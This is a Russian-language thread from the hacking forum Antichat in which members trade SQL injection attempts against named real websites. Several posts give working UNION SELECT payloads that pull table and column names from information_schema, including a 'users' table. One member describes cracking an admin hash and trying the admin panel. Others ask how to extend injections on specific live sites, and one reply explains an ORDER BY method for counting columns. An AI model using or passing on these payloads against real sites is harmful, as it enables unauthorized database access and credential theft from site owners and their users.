HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.10.2009, 01:00
Amdell_13
Новичок
Регистрация: 03.07.2009
Сообщений: 3
С нами: 8872816

Репутация: -4
По умолчанию

Странно чё-то с этим www.poznay-mir.ru
нашёл юзера root
и пасс зашифрованый
Цитата:


856CD78A9BDB55DA3D32F14FFA42750B9BB8FAC0



когда прогнал по базам хэш нашел пароль

Скрытый текст (вы должны быть авторизованы и иметь 50 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



потом зашел в админку
http://www.poznay-mir.ru/admin/index.php
проверил и не подошло(((
 
Ответить с цитированием

  #2  
Старый 28.10.2009, 01:00
lesha_firs
Новичок
Регистрация: 25.10.2009
Сообщений: 25
С нами: 8708726

Репутация: 0
По умолчанию

Вот код не выдает табл...

code:

http://www.pkrussia.ru/index.php?id=-1%20union%20select%201,2,table_name,4,5,6,7,8,9,10 %20from%20information_schema.tables

Вот скрин

 
Ответить с цитированием

  #3  
Старый 02.11.2009, 01:00
dimaxx
Участник форума
Регистрация: 24.06.2009
Сообщений: 111
С нами: 8885846

Репутация: 8
По умолчанию

есть прога для упрощение иньекций

SQLIHelperV извините ссылочки нет
 
Ответить с цитированием

  #4  
Старый 23.11.2009, 01:00
Yakim
Новичок
Регистрация: 19.11.2010
Сообщений: 21
С нами: 8147126

Репутация: 0
По умолчанию

code:

http://unitedcastbar.com/site.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+information_schema.columns+where+ta ble_name='users'--

code:

http://www.medialaw.kz/index.php?c=-1655+union+select+group_concat(column_name),2+from +information_schema.columns+where+table_name='CHAR ACTER_SETS'--

чё тут не так?)
 
Ответить с цитированием

  #5  
Старый 01.01.2010, 01:00
{Brandon}
Новичок
Регистрация: 24.12.2009
Сообщений: 18
С нами: 8622326

Репутация: 0
По умолчанию

http://www.turkishculturalfoundation...ages.php?ID=82'
Подскажите как раскрутить инъекцию дальше? я ставилю запросы но ничего не происходит.
 
Ответить с цитированием

  #6  
Старый 01.01.2010, 01:00
kit
Новичок
Регистрация: 11.06.2010
Сообщений: 0
С нами: 8377950

Репутация: 0
По умолчанию

Дай ссылку на обычный сайт ща сам попробую
 
Ответить с цитированием

  #7  
Старый 01.01.2010, 01:00
{Brandon}
Новичок
Регистрация: 24.12.2009
Сообщений: 18
С нами: 8622326

Репутация: 0
По умолчанию

http://www.turkishculturalfoundation.org/

Добавлено через 25 минут
просканил xspider говарит что инъекция есть

Добавлено через 1 час 1 минуту
Kit,ну что получилось чтонибудь?

Добавлено через 1 час 52 минуты
http://www.aquariustour.ru/news/
А где id взять чтоб инъекцию дальше расскрутить?
 
Ответить с цитированием

  #8  
Старый 10.02.2010, 01:00
ROCK_sTaR
Познающий
Регистрация: 04.02.2010
Сообщений: 45
С нами: 8561846

Репутация: 3
По умолчанию

The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))
 
Ответить с цитированием

  #9  
Старый 10.02.2010, 01:00
Jmylia
Познающий
Регистрация: 17.07.2009
Сообщений: 36
С нами: 8852726

Репутация: -3
По умолчанию

Цитата:


>The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))
================================================== ========



Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)

Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.

Сначала узнайте количество таблиц при помощи команды order+by:

Цитата:


Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/* - при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/* - ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/* - ошибка исчезла а при введении http://site.com/main.php?id=12+order+by+11/* появилась, из этого следует что количество таблиц 10.
 
Ответить с цитированием

  #10  
Старый 25.02.2010, 01:00
fincher
Новичок
Регистрация: 02.02.2010
Сообщений: 0
С нами: 8564698

Репутация: 0
По умолчанию

как с этим быть? http://wow.dport.com.ua/bugtracke/?page='

это ведь инъекция?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.